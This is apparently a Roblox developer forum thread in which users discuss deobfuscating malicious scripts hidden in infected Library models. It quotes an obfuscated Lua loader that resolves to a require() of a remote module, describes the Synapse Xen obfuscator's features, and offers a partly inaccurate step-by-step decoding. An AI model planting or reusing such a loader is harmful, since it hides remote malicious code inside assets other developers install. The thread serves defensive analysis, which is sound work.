How do I dissect obfuscated scripts?

I’m finding a few infected models being botted to the front of the Library. These models have obfuscated scripts in them. Heck, this script in one model (with loooong tab spam removed):

getfenv()[string.reverse("\101\114\105\117\113\101\114")](getfenv()["\116\111\110\117\109\98\101\114"](string["\99\104\97\114"](getfenv()["\117\110\112\97\99\107"]{48,88,67,67,52,48,67,69,65,49})))

turned into this:

require(3426799265)

The ModuleScript there has a ton of obfuscated code. It even does local variable spam:

local a=select;local b=string.byte;local c=string.sub;local d=string.char;

I can deobfuscate stuff, but I don’t have the time to dig through this much obfuscated code.

Anybody know of helper tools or resources I can use to solve things like this faster?

You can just copy the code in Microsoft word and then just use the find and replace feature to change the variable names throughout the code.

Outside of stuff to make it easier (such as a beautifier), not really. You’ll have to dissect it by hand, but it’s quite an enjoyable experience personally. You learn something from it, there’s no loss on your part.

If you require a beautifier (can also rename variable names to make reverse engineering it a bit easier) then you can use this: https://www.roblox.com/library/197760456/Stravant-Minify-Beautify

Great plugin by stravant, super useful for when I need to take apart some obfuscated code.

I like the formatting. This should help.

The script is way too large for the plugin to see the whole thing (Roblox API truncates script.Source to something like 20,000 characters), and so it errors. Ima try to feed in the text directly using a script that uses string block syntax.

Hi there.

Just worth bring it up that this has been obfuscated using Synapse Xen, the tools around to handle this is limited and is not designed to be easy to fix; along with any efforts shared anywhere in the DevFourms could be seen, especially public and new member areas, so please expect that when communicating here like you are.

Effectively, this is not a fast process and will take a long period of time. It also depends on what settings have been used with Xen and how that can change how you deobfuscate. These are, according to the creator :

• Reduced Mode: You can disable certain protection features to improve script performance. This is useful for larger scripts that wish to keep high performance while still being obfuscated.

• Constant Protection: This protection allows you to protect certain constants in your script from being dumped. This is really useful for ‘high value’ strings that you do not want to be grabbed from your script.

• Anti-Axon/Anti-Sandbox Built In: Synapse Xen gives you the option to automatically disallow people using Axon based exploits from executing your scripts, while requiring no changes on your end. It also protects against most types of Lua sandboxes commonly used by Roblox game developers.

• VM Bytecode Obfuscation: This protects the Synapse Xen VM at the bytecode level, making it even more difficult for someone to reverse engineer your scripts. This feature currently only works on Synapse X. (and hopefully ProtoSmasher in the next update)

According to creator,

Synapse Xen uses all available techniques I know of to protect your script. Of course, deobfuscating your script (or by that matter, any obfuscated application) is possible, but doing it is very difficult, time consuming, and is most definitely not a trivial task.

This is not just a few simple tricks, this person has spent a lot of time at the very details of Lua and Roblox to create tools like this.

Based on this, including that the price to use this is free (w/ Synapse X), it’s worth reminding you that even when you do, it may be possible that they’ll find a work around and just make it harder to deobfuscate in the future.

Taking the script you provided;

getfenv()[string.reverse("\101\114\105\117\113\101\114")](getfenv()["\116\111\110\117\109\98\101\114"](string["\99\104\97\114"](getfenv()["\117\110\112\97\99\107"]{48,88,67,67,52,48,67,69,65,49})))

All you have to do to deobfuscate is to add a print() statement, here is what we get;

print("\101\114\105\117\113\101\114\116\111\110\117\109\98\101\114\99\104\97\114\117\110\112\97\99\107")

eriuqer --The reason why they have string.reverse() is because if you print this area with string.reverse() it reverses the string, pretty sure you already knew this. 
require --this is what it is when reversed
tonumber --A to number statement
char --Character?
unpack --Unpack argument

Now we are left with this which is a table.

{48,88,67,67,52,48,67,69,65,49}

Now lets move on to the module, this is super difficult, as railworks mentioned.

I was able to decode this module, but it took me around 20 minutes. My only issue is, this has a ton of profanity in it, so I will not be posting this.
(Once I remove all profanity however I will post the module. Using Hex you can decode most of this, then the rest is manual.)

I’ve gotten rid of all the profanity, here is a download to the module.
DoNotRunThisModuleItisAVirusDecoded.lua (78.7 KB)

I am unsure if this uses Synapse Xen, or Luraph. It mentions buying Luraph instead of Synapse several times, so I am guessing this is Luraph encoded. From what I’ve heard, Luraph is much easier to decode than Synapse Xen. I used a HexDecoder, and then the rest I decoded on my own. This took approximately 20 minutes.